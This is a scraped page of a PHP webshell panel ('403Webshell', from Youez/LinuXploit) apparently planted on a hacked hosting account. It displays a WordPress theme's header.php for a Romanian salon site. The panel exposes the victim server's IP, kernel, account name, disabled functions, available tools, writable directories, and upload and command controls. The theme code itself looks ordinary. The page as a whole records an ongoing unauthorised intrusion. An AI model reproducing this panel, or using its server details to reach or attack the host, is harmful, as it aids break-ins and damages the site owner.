403Webshell
Server IP : 5.83.47.51  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux hosting.nxthost.com 5.14.0-687.44.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Sep 9 11:11:28 EDT 2026 x86_64
User : esteemro ( 1261)
PHP Version : 7.4.33
Disable Function : show_source, system, shell_exec, passthru, exec, popen, proc_open
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/esteemro/public_html/wp-content/themes/pure/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/esteemro/public_html/wp-content/themes/pure/header.php
<?php
/**
 * The header for our theme.
 *
 * This is the template that displays all of the <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"> section and everything up until <div id="content">
 *
 * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package parlour
 */

// Those settings comes from customizer for control boxed layout + preloader loading
$layout        = get_theme_mod('parlour_global_layout', 'full');
$padding       = get_theme_mod('parlour_global_padding');
$boxed_class   = ['tm-page'];
$boxed_class[] = $padding ? 'tm-page-padding' : '';
$preloader     = get_theme_mod('parlour_preloader');

?><!DOCTYPE html>
<html <?php language_attributes(); ?>>
    <script>
	document.addEventListener("DOMContentLoaded", function() {
    const hamburgerMenu = document.querySelector('.hamburger-menu');
    const navMenu = document.querySelector('.nav-menu');

    hamburgerMenu.addEventListener('click', function() {
        this.classList.toggle('active');
        navMenu.classList.toggle('active');
    });
});



</script>
<head>
<meta name="author" content="Toni" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="http://gmpg.org/xfn/11">
<?php if ( is_singular() && pings_open( get_queried_object() ) ) : ?>
<link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>">
<?php endif; ?>
<meta name="mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="google-site-verification" content="RKReMtNCPWotuy1UrzyK5_R3vj73gEUFfWVv0vEvay4" />

<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=AW-11302869185"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'AW-11302869185');
</script>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-MJQBFGDW9M"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-MJQBFGDW9M');
</script>
<!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '836979281100313');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=836979281100313&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code -->
<?php wp_head(); ?>
<div class="menu-container">
    <div class="hamburger-menu">
        <div></div>
        <div></div>
        <div></div>
    </div>
    <nav class="nav-menu">
        <!-- Imaginea cu link către homepage -->
        <div class="logo-container">
            <a href="<?php echo home_url(); ?>">
                <img src="https://esteem.ro/wp-content/uploads/2023/08/esteem_mobile.png" alt="Logo Site">
            </a>
        </div>
        <!-- Afișare meniu categorii -->
        <?php wp_nav_menu( array( 'theme_location' => 'categorii' ) ); ?>
    </nav>
</div>
</head>

<body <?php body_class(); ?>>
<style>
	#cookie-bar {
    z-index: 999999;
}
	/* .black_friday a{
		color: #ffffff !important;
	}
	.black_friday a:hover{
		color: #ffffff !important;
	}
	li[data-id="16017"] a {
    background: #000 !important;
}
.page-id-15936 div#tm-titlebar {
    background-color: #000 !important;
}
	.black_friday {
		background-color: #000;
		color: #ffffff;
		font-size: 18px;
		text-align: center;
		padding: 7px 10px;
		z-index: 1;
		position: relative;
		height: 41px;
		display: flex;
		align-items: center;
		justify-content: center;
	} */
	</style>
	<!-- <div class="black_friday"><a href="https://puresalon.ro/promotii/">Black Friday - Pana la 78% Reducere</a></div> -->
    <!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-PCPSC4F"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
    <?php if ($preloader) : ?>
		<?php get_template_part('template-parts/preloader'); ?>
	<?php endif ?>
	
	<?php // this condition for boxed mode layout those started div end in end of the footer.php file ?>
	<?php if ($layout == 'boxed') : ?>
	<div<?php echo parlour_helper::attrs(['class' => $boxed_class]) ?>>
	    <div <?php echo ($layout == 'boxed') ? 'class="uk-margin-auto"' : '' ?>>
	<?php endif ?>
			
			<?php // If you select page template blank so this condition will be activate ?>
			<?php if (!is_page_template( 'page-blank.php' ) and !is_404()) : ?>
				<?php get_template_part('template-parts/drawer');	?>
				
				<div class="tm-header-wrapper">
					<?php get_template_part( 'template-parts/toolbar' ); ?>

					
					<?php get_template_part('template-parts/headers/header-mobile'); ?>
					<?php get_template_part('template-parts/headers/header-default'); ?>
					<!-- <span class="attention_bar">Ne asiguram sa pastram un mediu sigur si acordam o mare atentie dezinfectarii obiectelor si suprafetelor cu care intri in contact.</span> -->

				</div>

				<?php // this is page title that show after header and top of body section ?>
				<?php if (!is_front_page() and !is_page_template( 'page-homepage.php' )) : ?>
					<?php get_template_part('template-parts/titlebar');	?>	
				<?php endif; ?>
				
				<?php get_template_part('template-parts/slider');	?>
			<?php endif; ?>

Youez - 2016 - github.com/yon3zu
LinuXploit